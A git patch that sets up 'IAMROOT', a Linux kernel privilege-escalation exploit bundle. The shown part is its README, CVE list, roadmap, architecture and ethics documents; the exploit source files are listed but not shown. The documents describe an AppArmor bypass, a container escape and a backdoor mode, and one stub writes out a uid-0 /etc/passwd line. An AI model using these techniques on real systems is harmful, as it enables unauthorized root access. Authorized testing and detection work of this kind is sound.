From cf30b249debae07a6fc6d03afa64ac8841262550 Mon Sep 17 00:00:00 2001 From: KaraZajac Date: Sat, 16 May 2026 19:26:24 -0400 Subject: [PATCH] Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL --- .gitignore | 11 + CVES.md | 58 + LICENSE | 35 + Makefile | 26 + README.md | 99 ++ ROADMAP.md | 111 ++ docs/ARCHITECTURE.md | 119 ++ docs/ETHICS.md | 75 + .../_stubs/dirty_pipe_cve_2022_0847/MODULE.md | 47 + .../_stubs/entrybleed_cve_2023_0458/MODULE.md | 56 + modules/_stubs/fragnesia_TBD/MODULE.md | 27 + modules/copy_fail_family/MODULE.md | 1243 +++++++++++++++++ modules/copy_fail_family/Makefile | 93 ++ modules/copy_fail_family/NOTICE.md | 72 + modules/copy_fail_family/apparmor_bypass.c | 365 +++++ modules/copy_fail_family/apparmor_bypass.h | 113 ++ modules/copy_fail_family/backdoor.c | 382 +++++ modules/copy_fail_family/backdoor.h | 59 + modules/copy_fail_family/common.c | 362 +++++ modules/copy_fail_family/common.h | 197 +++ modules/copy_fail_family/copyfail.c | 451 ++++++ modules/copy_fail_family/copyfail.h | 33 + modules/copy_fail_family/copyfail_gcm.c | 634 +++++++++ modules/copy_fail_family/copyfail_gcm.h | 61 + modules/copy_fail_family/dirtyfail.c | 475 +++++++ modules/copy_fail_family/dirtyfrag_esp.c | 804 +++++++++++ modules/copy_fail_family/dirtyfrag_esp.h | 40 + modules/copy_fail_family/dirtyfrag_esp6.c | 698 +++++++++ modules/copy_fail_family/dirtyfrag_esp6.h | 46 + modules/copy_fail_family/dirtyfrag_rxrpc.c | 1069 ++++++++++++++ modules/copy_fail_family/dirtyfrag_rxrpc.h | 34 + modules/copy_fail_family/docs/DEFENDERS.md | 244 ++++ modules/copy_fail_family/docs/RESEARCH.md | 324 +++++ modules/copy_fail_family/exploit_su.c | 530 +++++++ modules/copy_fail_family/exploit_su.h | 56 + modules/copy_fail_family/fcrypt.c | 303 ++++ modules/copy_fail_family/fcrypt.h | 68 + modules/copy_fail_family/mitigate.c | 182 +++ modules/copy_fail_family/mitigate.h | 46 + modules/copy_fail_family/tests/test_aes_ecb.c | 
101 ++ modules/copy_fail_family/tests/test_fcrypt.c | 84 ++ .../copy_fail_family/tools/99-dirtyfail.rules | 100 ++ .../copy_fail_family/tools/dirtyfail-check.sh | 181 +++ .../tools/dirtyfail-container-escape.sh | 149 ++ .../tools/exploit_su_aarch64.S | 73 + 45 files changed, 10336 insertions(+) create mode 100644 .gitignore create mode 100644 CVES.md create mode 100644 LICENSE create mode 100644 Makefile create mode 100644 README.md create mode 100644 ROADMAP.md create mode 100644 docs/ARCHITECTURE.md create mode 100644 docs/ETHICS.md create mode 100644 modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md create mode 100644 modules/_stubs/entrybleed_cve_2023_0458/MODULE.md create mode 100644 modules/_stubs/fragnesia_TBD/MODULE.md create mode 100644 modules/copy_fail_family/MODULE.md create mode 100644 modules/copy_fail_family/Makefile create mode 100644 modules/copy_fail_family/NOTICE.md create mode 100644 modules/copy_fail_family/apparmor_bypass.c create mode 100644 modules/copy_fail_family/apparmor_bypass.h create mode 100644 modules/copy_fail_family/backdoor.c create mode 100644 modules/copy_fail_family/backdoor.h create mode 100644 modules/copy_fail_family/common.c create mode 100644 modules/copy_fail_family/common.h create mode 100644 modules/copy_fail_family/copyfail.c create mode 100644 modules/copy_fail_family/copyfail.h create mode 100644 modules/copy_fail_family/copyfail_gcm.c create mode 100644 modules/copy_fail_family/copyfail_gcm.h create mode 100644 modules/copy_fail_family/dirtyfail.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp.h create mode 100644 modules/copy_fail_family/dirtyfrag_esp6.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp6.h create mode 100644 modules/copy_fail_family/dirtyfrag_rxrpc.c create mode 100644 modules/copy_fail_family/dirtyfrag_rxrpc.h create mode 100644 modules/copy_fail_family/docs/DEFENDERS.md create mode 100644 
modules/copy_fail_family/docs/RESEARCH.md create mode 100644 modules/copy_fail_family/exploit_su.c create mode 100644 modules/copy_fail_family/exploit_su.h create mode 100644 modules/copy_fail_family/fcrypt.c create mode 100644 modules/copy_fail_family/fcrypt.h create mode 100644 modules/copy_fail_family/mitigate.c create mode 100644 modules/copy_fail_family/mitigate.h create mode 100644 modules/copy_fail_family/tests/test_aes_ecb.c create mode 100644 modules/copy_fail_family/tests/test_fcrypt.c create mode 100644 modules/copy_fail_family/tools/99-dirtyfail.rules create mode 100755 modules/copy_fail_family/tools/dirtyfail-check.sh create mode 100755 modules/copy_fail_family/tools/dirtyfail-container-escape.sh create mode 100644 modules/copy_fail_family/tools/exploit_su_aarch64.S diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0b72099 --- /dev/null +++ b/.gitignore @@ -0,0 +1,11 @@ +build/ +*.o +*.a +*.so +*.dSYM/ +modules/*/build/ +modules/*/dirtyfail +modules/*/iamroot +.vscode/ +.idea/ +*.swp diff --git a/CVES.md b/CVES.md new file mode 100644 index 0000000..560227b --- /dev/null +++ b/CVES.md @@ -0,0 +1,58 @@ +# CVE inventory + +The curated list of CVEs IAMROOT exploits, with patch status and +module status. Updated as new modules land or as upstream patches +ship. + +Status legend: + +- 🟒 **WORKING** β€” module verified to land root on a vulnerable host +- 🟑 **PARTIAL** β€” module detects + exploits on some distros, not all +- πŸ”΅ **DETECT-ONLY** β€” module fingerprints presence/absence but no + exploit (yet). Useful for blue teams. 
+- ⚪ **PLANNED** — stub exists, work not started +- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for + historical reference only + +## Inventory + +| CVE | Name | Class | First patched | IAMROOT module | Status | Notes | +|---|---|---|---|---|---|---| +| CVE-2026-31431 | Copy Fail (algif_aead `authencesn` page-cache write) | LPE (page-cache write → /etc/passwd) | mainline 2026-04-22 | `copy_fail_family/copy_fail` | 🟢 | Verified on Ubuntu 26.04, Alma 9, Debian 13. Full AppArmor bypass. | +| CVE-2026-43284 (v4) | Dirty Frag — IPv4 xfrm-ESP page-cache write | LPE (same primitive shape as Copy Fail, different trigger) | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp` | 🟢 | Full PoC + active-probe scan | +| CVE-2026-43284 (v6) | Dirty Frag — IPv6 xfrm-ESP (`esp6`) | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp6` | 🟢 | V6 STORE shift auto-calibrated per kernel build | +| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_rxrpc` | 🟢 | | +| (variant, no CVE) | Copy Fail GCM variant — xfrm-ESP `rfc4106(gcm(aes))` page-cache write | LPE | n/a | `copy_fail_family/copy_fail_gcm` | 🟢 | Sibling primitive, same fix | +| CVE-2022-0847 | Dirty Pipe — pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 2022-02-23 | `_stubs/dirty_pipe_cve_2022_0847` | ⚪ | Stub. Public PoCs exist; bundling for completeness. Affects kernels before 5.16.11 / 5.15.25 / 5.10.102 (the fixed releases) | +| CVE-2023-0458 | EntryBleed — KPTI prefetchnta KASLR bypass | INFO-LEAK (kbase) | mainline (partial mitigations only) | `_stubs/entrybleed_cve_2023_0458` | ⚪ | Stub. Used as STAGE-1 leak brick, not a standalone LPE. Works on lts-6.12.88 (empirical 5/5). | +| CVE-2026-31402 | NFS replay-cache heap overflow | LPE (NFS server) | mainline 2026-04-03 | — | ⚪ | Candidate. Different audience (NFS servers) — TBD whether in-scope. 
| +| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | βšͺ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns β€” may or may not be in-scope depending on target environment. | + +## Pipeline for additions + +1. Bug must be **patched in upstream mainline** (we don't bundle + 0-days) +2. Either **CVE-assigned** or has clear advisory/patch reference +3. Affects a kernel version range with realistic deployment footprint + (we don't bundle exploits for kernels nobody runs) +4. PoC works on at least one distro+kernel in our CI matrix +5. Detection signature(s) shipped alongside the exploit + +## Patch-status tracking + +Each module's `kernel-range.json` (planned) declares the affected +range. CI verifies the exploit fails on the first-patched version +and succeeds below it. When a distro backports the fix into a kernel +version below the original first-patched, the matrix updates and +the relevant distro drops out of the "WORKING" list for that module. 
+ +## Why we exclude some things + +- **0-days the maintainer found themselves**: those go through + responsible disclosure first, then enter IAMROOT after upstream patch +- **kCTF VRP submissions in flight**: same as above; disclosure + before bundling +- **Hardware-specific side channels** (Spectre/Meltdown variants): + out of scope; not page-cache or process-isolation primitives +- **Container-escape only**: unless it cleanly chains to host-root, + out of scope (separate tool space) diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..ad3759e --- /dev/null +++ b/LICENSE @@ -0,0 +1,35 @@ +MIT License + +Copyright (c) 2026 DIRTYFAIL contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- + +DISCLAIMER FOR SECURITY RESEARCH SOFTWARE + +This software is provided for authorized security research, education, and +defensive testing only. By using this software, you agree that: + +1. 
You will only run the exploit modes (--exploit-*) on systems you own or + are explicitly authorized to test. +2. You understand that the exploit modes modify the kernel page cache copy + of /etc/passwd and that this is a privilege-escalation operation while + it persists. The on-disk file is not modified. +3. The authors disclaim all liability for any misuse of this software. diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..23daf31 --- /dev/null +++ b/Makefile @@ -0,0 +1,26 @@ +# IAMROOT top-level Makefile +# +# Phase 0 (current): defers to modules/copy_fail_family/Makefile. +# Phase 1: real dispatcher build that links all modules into one +# binary. See ROADMAP.md. + +MODULES := copy_fail_family + +.PHONY: all clean $(MODULES) + +all: $(MODULES) + +$(MODULES): + $(MAKE) -C modules/$@ + +clean: + @for m in $(MODULES); do \ + $(MAKE) -C modules/$$m clean; \ + done + rm -rf build/ + +# Convenience: scan the host using the absorbed DIRTYFAIL-as-module +# until Phase 1's real dispatcher lands. +scan: + @modules/copy_fail_family/dirtyfail --scan 2>/dev/null || \ + (echo "Build the copy_fail module first: make copy_fail_family" && exit 1) diff --git a/README.md b/README.md new file mode 100644 index 0000000..39fcecd --- /dev/null +++ b/README.md @@ -0,0 +1,99 @@ +# IAMROOT + +> A curated, actively-maintained corpus of Linux kernel LPE exploits β€” +> bundled with their detection signatures, patch status, and version +> ranges. Run it on a system you own (or are authorized to test) and +> it tells you which historical and recent CVEs that system is still +> vulnerable to, and β€” with explicit confirmation β€” gets you root. 
+ +``` + β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β• + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ + β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• +``` + +> ⚠️ **Authorized testing only.** IAMROOT is a research and red-team +> tool. By using it you assert you have explicit authorization to test +> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md). + +## What this is + +Most Linux LPE references are dead repos, broken PoCs, or single-CVE +deep-dives. **IAMROOT is a living corpus**: each CVE that lands here +is empirically verified to work on the kernels it claims to target, +CI-tested across a distro matrix, and ships with the detection +signatures defenders need to spot it in their environment. + +The same binary covers offense and defense: + +- `iamroot --scan` β€” fingerprint the host, report which bundled CVEs + apply, and which are blocked by patches/config/LSM +- `iamroot --exploit ` β€” run the named exploit (with `--i-know` + authorization gate) +- `iamroot --detect-rules` β€” dump auditd / sigma / yara rules for + every bundled CVE so blue teams can drop them into their tooling +- `iamroot --mitigate` β€” apply temporary mitigations for CVEs the + host is vulnerable to (sysctl knobs, module blacklists, etc.) + +## Status + +**Active. 
Bootstrap phase as of 2026-05-16.** First module +(`copy_fail_family`) absorbed from the standalone DIRTYFAIL project +and is verified working end-to-end on Ubuntu 26.04 + Alma 9 + Debian +13 with full AppArmor bypass + container escape demo + persistent +backdoor mode. + +See [`CVES.md`](CVES.md) for the full curated CVE list with patch +status. See [`ROADMAP.md`](ROADMAP.md) for the next planned modules. + +## Why this exists + +The Linux kernel privilege-escalation space is fragmented: + +- **`linux-exploit-suggester` / `linpeas`**: suggest applicable + exploits, don't run them +- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely + stale, no CI, no defensive signatures +- **Per-CVE single-PoC repos**: usually one author, often abandoned + within months of release, often only one distro + +IAMROOT's bet is that there's room for a single curated bundle that +(1) actively maintains a small set of high-quality exploits across a +multi-distro matrix, and (2) ships detection rules alongside each +exploit so the same project serves both red and blue teams. + +## Architecture + +Each CVE (or tightly-related family) is a **module** under `modules/`. +Modules export a standard interface: `detect()`, `exploit()`, +`mitigate()`, `cleanup()`, plus metadata describing affected kernel +ranges, distro coverage, and CI test matrix. + +Shared infrastructure (AppArmor bypass, su-exploitation primitives, +fingerprinting, common utilities) lives in `core/`. + +See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the +module-loader design and how to add a new CVE. + +## Build & run + +```bash +make # build all modules +sudo ./iamroot --scan # what's this box vulnerable to? 
+sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines +sudo ./iamroot --detect-rules --format=sigma > rules.yml +sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit +``` + +## Acknowledgments + +Each module credits the original CVE reporter and PoC author in its +`NOTICE.md`. IAMROOT is the bundling and bookkeeping layer; the +research credit belongs to the people who found the bugs. + +## License + +MIT β€” see [`LICENSE`](LICENSE). diff --git a/ROADMAP.md b/ROADMAP.md new file mode 100644 index 0000000..9c884b0 --- /dev/null +++ b/ROADMAP.md @@ -0,0 +1,111 @@ +# Roadmap + +What's coming next, in priority order. Dates are aspirational, not +commitments. + +## Phase 0 β€” Bootstrap (DONE as of 2026-05-16) + +- [x] Repo structure (modules/, core/, docs/, tools/, tests/) +- [x] Absorbed DIRTYFAIL as the first module + (`modules/copy_fail_family/`) +- [x] Top-level README, CVES.md, ROADMAP.md, docs/ARCHITECTURE.md, + docs/ETHICS.md +- [x] LICENSE (MIT) +- [x] Private GitHub repo + +## Phase 1 β€” Make the bundling real (next session) + +- [ ] Top-level `iamroot` dispatcher CLI (`iamroot.c`) β€” module + registry, fingerprint, route to module's detect/exploit +- [ ] Module interface header (`core/module.h`) β€” standard + `iamroot_module` struct each module exports +- [ ] Refactor `modules/copy_fail_family/` internals to expose the + standard module interface +- [ ] Extract shared code into `core/`: `apparmor_bypass.c`, + `exploit_su.c`, `common.c`, `fcrypt.c` (currently duplicated + under the absorbed DIRTYFAIL tree) +- [ ] Top-level `Makefile` that builds all modules into one binary +- [ ] Smoke test: `iamroot --scan --json` on Ubuntu 26.04 + produces sensible output + +## Phase 2 β€” Add Dirty Pipe (CVE-2022-0847) + +Public PoC, well-understood, useful for completeness β€” IAMROOT +without Dirty Pipe is incomplete as a "historical bundle." 
 Affects +kernels before 5.16.11/5.15.25/5.10.102 so coverage is older +deployments (worth bundling — many production boxes still run +these). + +- [ ] `modules/dirty_pipe_cve_2022_0847/` — exploit + detect + range + metadata +- [ ] Test matrix: Ubuntu 20.04 (vulnerable kernels), Debian 11 + (vulnerable kernels), modern kernels (immune — should detect + as patched) +- [ ] Detection rules: auditd splice/pipe write patterns + +## Phase 3 — Add EntryBleed (CVE-2023-0458) as stage-1 leak brick + +EntryBleed is **not a standalone LPE**. It's a **kbase leak +primitive** that other modules can chain. Bundle it because: + +- Stage-1 of any future "build-your-own LPE" workflow +- Detection rules for KPTI side-channel attempts are useful for + defenders +- Already works empirically on lts-6.12.88 (verified 2026-05-16) + +- [ ] `modules/entrybleed_cve_2023_0458/` — leak primitive + + detect-mitigations +- [ ] Exposed as a library helper: other modules can call + `entrybleed_leak_kbase()` when they need a kbase + +## Phase 4 — CI matrix + +- [ ] Distro+kernel VM matrix in GitHub Actions (Ubuntu 20.04 / + 22.04 / 24.04 / 26.04, Debian 11 / 12 / 13, Alma 8 / 9 / 10, + Fedora 39 / 40 / 41) +- [ ] Each module's exploit runs against matched-vulnerable VMs and + MUST land root; runs against patched VMs and MUST fail at + detect step +- [ ] Nightly run; failures open issues automatically + +## Phase 5 — Detection signature export + +- [ ] `iamroot --detect-rules --format=sigma` — Sigma rules per CVE +- [ ] `--format=yara` — YARA rules for static detection of exploit + binaries +- [ ] `--format=auditd` — auditd `.rules` snippets +- [ ] `--format=falco` — Falco rule snippets +- [ ] Sample SOC playbook in `docs/DETECTION_PLAYBOOK.md` + +## Phase 6 — Mitigation mode + +- [ ] `iamroot --mitigate` walks the host's vulnerabilities, applies + temporary sysctl / module-blacklist / LSM workarounds +- [ ] Per-CVE rollback procedure if the mitigation breaks something +- [ ] 
Idempotent: running twice is safe + +## Phase 7+ β€” More modules + +Backfill of historical and recent LPEs as time allows: + +- [ ] **CVE-2021-3493** β€” overlayfs nested-userns LPE +- [ ] **CVE-2021-4034** β€” Pwnkit (pkexec env handling) +- [ ] **CVE-2022-2588** β€” net/sched route4 dead UAF +- [ ] **CVE-2023-2008** β€” vmwgfx OOB write +- [ ] **CVE-2024-1086** β€” netfilter nf_tables UAF +- [ ] Fragnesia (if it lands as a CVE) +- [ ] Anything we ourselves disclose β€” bundled AFTER upstream patch + ships (responsible-disclosure-first) + +## Non-goals + +- **No 0-day shipment.** Everything in IAMROOT is post-patch. +- **No automated mass-targeting.** No host-list mode. No automatic + pivoting. +- **No persistence beyond `--exploit-backdoor`'s + `/etc/passwd` overwrite**, which is overt and easily detected by + any auditd rule we ship ourselves. Persistence-as-evasion is out + of scope. +- **No container-runtime escapes** unless they cleanly chain to + host-root. +- **No Windows / macOS / non-Linux targets.** Focus is the moat. diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md new file mode 100644 index 0000000..91159b4 --- /dev/null +++ b/docs/ARCHITECTURE.md @@ -0,0 +1,119 @@ +# Architecture + +## Module model + +Each CVE (or tightly-related family of CVEs sharing a primitive) is +a **module** under `modules/`. A module is a self-contained +exploit + detection + metadata bundle that exports a standard +interface to the top-level dispatcher. 
+ +### Module layout + +``` +modules/<name>/ +├── MODULE.md # Human-readable writeup of the bug +├── NOTICE.md # Credits to original researcher +├── kernel-range.json # Machine-readable affected kernels +├── module.c # Implements iamroot_module interface +├── module.h +├── detect/ +│ ├── auditd.rules # blue team detection +│ ├── sigma.yml +│ └── yara.yara +├── src/ # exploit internals +└── tests/ # per-module tests (run in CI matrix) +``` + +### `iamroot_module` interface (planned, Phase 1) + +```c +struct iamroot_module { + const char *name; /* "copy_fail" */ + const char *cve; /* "CVE-2026-31431" */ + const char *summary; /* one-line description */ + + /* Return 1 if host appears vulnerable, 0 if patched/immune, + * -1 if probe couldn't run. May call entrybleed_leak_kbase() + * etc. from core/ if a leak primitive is needed. */ + int (*detect)(struct iamroot_host *host); + + /* Run the exploit. Caller has already passed the + * authorization gate. Returns 0 on root acquired, + * nonzero on failure. */ + int (*exploit)(struct iamroot_host *host, struct iamroot_opts *opts); + + /* Apply a runtime mitigation for this CVE (sysctl, module + * blacklist, etc.). Returns 0 on success. NULL if no + * mitigation is offered. */ + int (*mitigate)(struct iamroot_host *host); + + /* Undo --exploit-backdoor or --mitigate side effects. */ + int (*cleanup)(struct iamroot_host *host); + + /* Affected kernel version range, distros covered, etc. */ + const struct iamroot_kernel_range *ranges; + size_t n_ranges; +}; +``` + +Modules register themselves at link time via a constructor-attribute +table. The top-level `iamroot` binary iterates the registry on each +invocation. 
+ +## Shared `core/` + +Code that more than one module needs lives in `core/`: + +- `core/common.c` — fingerprinting (kernel version, distro, LSM, + hardening flags), logging, error handling +- `core/apparmor_bypass.c` — Ubuntu's + `apparmor_restrict_unprivileged_userns=1` defeat via + `change_onexec("crun")` re-exec +- `core/exploit_su.c` — once we have page-cache-write or + /etc/passwd-overwrite, this is the shared "drop to root shell" + helper +- `core/fcrypt.c` — file-encryption helpers used by multiple modules +- `core/entrybleed.c` (planned, Phase 3) — kbase leak primitive that + any module needing KASLR-defeat can call + +## Top-level dispatcher + +`iamroot.c` (planned, Phase 1) is the CLI entry point. Responsibilities: + +1. Parse args (`--scan`, `--exploit <name>`, `--mitigate`, + `--detect-rules`, `--cleanup`, etc.) +2. Fingerprint the host +3. For `--scan`: iterate module registry, call each module's + `detect()`, emit table of results +4. For `--exploit <name>`: locate module, gate behind `--i-know`, + call its `exploit()` +5. For `--detect-rules`: walk module registry, concatenate detection + files in the requested format + +## CI matrix + +`.github/workflows/ci.yml` (planned, Phase 4) runs each module's +test against a matrix of distro × kernel VMs. Each test asserts: + +- on a vulnerable VM: `detect()` returns 1, `exploit()` returns 0 + and produces uid=0 +- on a patched VM: `detect()` returns 0, `exploit()` either refuses + or fails gracefully + +Failures on a previously-working matrix entry open an issue +automatically (likely cause: distro shipped a backport that broke +the module). + +## Adding a new CVE + +1. `git checkout -b add-cve-XXXX-NNNN` +2. `cp -r modules/_stubs/_template modules/<name>` +3. Fill in `MODULE.md`, `NOTICE.md`, `kernel-range.json` +4. Implement `module.c` exposing the `iamroot_module` interface +5. Ship at least one detection rule under `detect/` +6. Add tests under `tests/` +7. PR. CI runs the matrix. 
If it lands root on at least one + vulnerable matched VM AND fails cleanly on a patched VM, it + merges. + +See `docs/module-template.md` (planned) for the per-module checklist. diff --git a/docs/ETHICS.md b/docs/ETHICS.md new file mode 100644 index 0000000..bef00a0 --- /dev/null +++ b/docs/ETHICS.md @@ -0,0 +1,75 @@ +# Ethics, scope, and acceptable use + +## Acceptable use + +IAMROOT is intended for: + +1. **Authorized red-team / pentest engagements.** You have a written + scope, signed by someone who can authorize testing on the target + systems. +2. **Defensive teams testing detection coverage.** You're using + IAMROOT in a lab to verify your auditd/sigma/falco rules fire as + expected. +3. **Security researchers studying historical LPEs.** You're reading + the code, running it in your own VMs, learning how the primitives + actually work end-to-end. +4. **Build engineers verifying patch coverage.** You're running + `iamroot --scan` against your fleet's golden images to confirm + each known CVE shows up as patched. + +## Not-acceptable use + +IAMROOT should not be used: + +1. On systems you do not own and have not been authorized to test +2. As part of unauthorized access to any system +3. To exfiltrate data or maintain persistence on a system after a + testing engagement is complete +4. To build a worm, scanner, or any tool that automatically targets + systems at scale without per-target authorization + +By using IAMROOT you assert that your use falls into the +acceptable-use cases above. + +## Why this is publishable + +Every CVE bundled in IAMROOT is: + +- **Already patched** in upstream mainline kernel +- **Already published** in NVD or distro security trackers +- **Already covered** by existing public PoCs + +IAMROOT does not introduce new offensive capability. It bundles, +documents, and CI-tests what is already public β€” and ships the +detection signatures defenders need to spot it. 
+ +The bundling itself does not lower the baseline competence required to +misuse this code: a script kiddie can already find and run +single-CVE PoCs on GitHub. Bundling improves quality and CI coverage +without meaningfully changing offensive capability, while providing +real defensive value through the detection-rule exports. + +## Disclosure + +If you find a bug in IAMROOT itself (incorrect detection, broken +exploit on a kernel where it should work, missing a backport in the +range metadata): file a public GitHub issue. + +If you find a **new 0-day kernel LPE while inspired by reading +IAMROOT code**: please disclose it responsibly to the kernel +security team (`security@kernel.org`) and the affected distros +*before* writing a public PoC. Once an upstream patch ships and a CVE +is assigned, IAMROOT will gladly accept the module. + +## Persistence and stealth are out of scope + +`--exploit-backdoor` in the copy_fail module overwrites a +`/etc/passwd` line with a `uid=0` shell account. This is **overt**: + +- The username is `iamroot` (was `dirtyfail`) — instantly identifiable +- It's covered by the auditd rules IAMROOT ships +- `--cleanup-backdoor` restores the original line + +If you're looking for evasion, persistence, or stealth: not here. +Use a real C2 framework if you have authorization to do so. IAMROOT +stops at "demonstrate that the bug works." diff --git a/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md b/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md new file mode 100644 index 0000000..417a660 --- /dev/null +++ b/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md @@ -0,0 +1,47 @@ +# Dirty Pipe — CVE-2022-0847 + +> ⚪ **PLANNED** module. See [`../../../ROADMAP.md`](../../../ROADMAP.md) +> Phase 2. + +## Summary + +Pipe-buffer `PIPE_BUF_FLAG_CAN_MERGE` was incorrectly inherited by +`copy_page_to_iter_pipe()` and `push_pipe()` paths, allowing an +unprivileged user to write into the page cache of any file readable +by them. 
+ +## Affected kernels + +- mainline/stable before 5.16.11 +- 5.15 LTS before 5.15.25 +- 5.10 LTS before 5.10.102 + +## Upstream patch + +`9d2231c5d74e13b2a0546fee6737ee4446017903` ("lib/iov_iter: initialize +"flags" in new pipe_buffer") + +## Why this module is here + +Even in 2026, many production deployments still run vulnerable +kernels (RHEL 7/8, older Ubuntu LTS, embedded). Bundling Dirty Pipe +makes IAMROOT useful as a "historical sweep" tool on long-tail +systems. + +## Implementation plan + +- C exploit ported from public PoCs (credit upstream authors in + `NOTICE.md` when implemented) +- `detect()`: kernel version check + `/proc/version` parse + test + for fixed-version backports +- `exploit()`: writes `iamroot::0:0:dirtypipe:/:/bin/bash` into + `/etc/passwd`, then `su iamroot` — same shape as copy_fail's + backdoor mode +- Detection rules: auditd on splice() calls + pipe write patterns, + filesystem audit on `/etc/passwd` modification by non-root + +## Not started yet + +Pick this up after Phase 1 (module-interface refactor of the +copy_fail family) so this module can use the standard +`iamroot_module` shape from the start. diff --git a/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md b/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md new file mode 100644 index 0000000..dbeacb2 --- /dev/null +++ b/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md @@ -0,0 +1,56 @@ +# EntryBleed — CVE-2023-0458 + +> ⚪ **PLANNED** stub module. See [`../../../ROADMAP.md`](../../../ROADMAP.md) +> Phase 3. + +## Summary + +KPTI's user-space-mapped entry trampoline is detectable via +`prefetchnta` timing, leaking the kernel base address (defeats +KASLR). Universal across modern x86_64 kernels with KPTI; only +partial mitigations have shipped upstream. + +## Why this is here + +EntryBleed is **not a standalone LPE**. It's a **stage-1 leak +primitive** that future LPE modules can call when they need a kbase. +Bundling it as a module: + +1. 
